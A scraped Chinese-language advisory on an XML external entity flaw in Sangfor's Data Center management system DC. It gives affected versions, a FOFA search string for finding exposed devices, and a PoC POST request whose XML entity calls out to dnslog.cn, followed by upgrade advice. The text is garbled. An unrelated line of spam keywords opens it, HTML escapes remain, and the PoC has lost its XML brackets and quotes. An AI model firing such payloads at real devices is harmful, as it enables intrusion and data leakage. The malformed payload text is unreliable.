手机网站特效代码,layui做移动网站,什么软件做电影短视频网站,韩国和乌拉圭谁出线0x01 产品简介 深信服数据中心管理系统DC为AC的外置数据中心#xff0c;主要用于海量日志数据的异地扩展备份管理#xff0c;多条件组合的高效查询#xff0c;统计和趋势报表生成#xff0c;设备运行状态监控等功能。
0x02 漏洞概述 深信服数据中心管理系统DC存在XML外部实…0x01 产品简介 深信服数据中心管理系统DC为AC的外置数据中心主要用于海量日志数据的异地扩展备份管理多条件组合的高效查询统计和趋势报表生成设备运行状态监控等功能。
0x02 漏洞概述 深信服数据中心管理系统DC存在XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析攻击者可以利用该漏洞进行XML注入攻击获取系统敏感信息。
0x03 影响范围 v6.1及以下版本
0x04 复现环境
FOFA SANGFOR 数据中心 0x05 漏洞复现
PoC
POST /src/sangforindex HTTP/1.1
Host: your-ip
Content-Type: text/xml?xml version1.0 encodingutf-8 ?
!DOCTYPE root [!ENTITY rt SYSTEM http://dnslog.cn
]
xxx
rt;
/xxx
验证 0x06 修复建议
规避措施
将设备端口收缩内网可削减漏洞被利用风险。
升级方案
2016年4月发布的数据中心管理系统v11.0及以上版本已修复受影响用户可通过升级版本完成对漏洞的修复。可拨打深信服漏洞专属修复热线400-005-5530获取或联系当地服务人员。
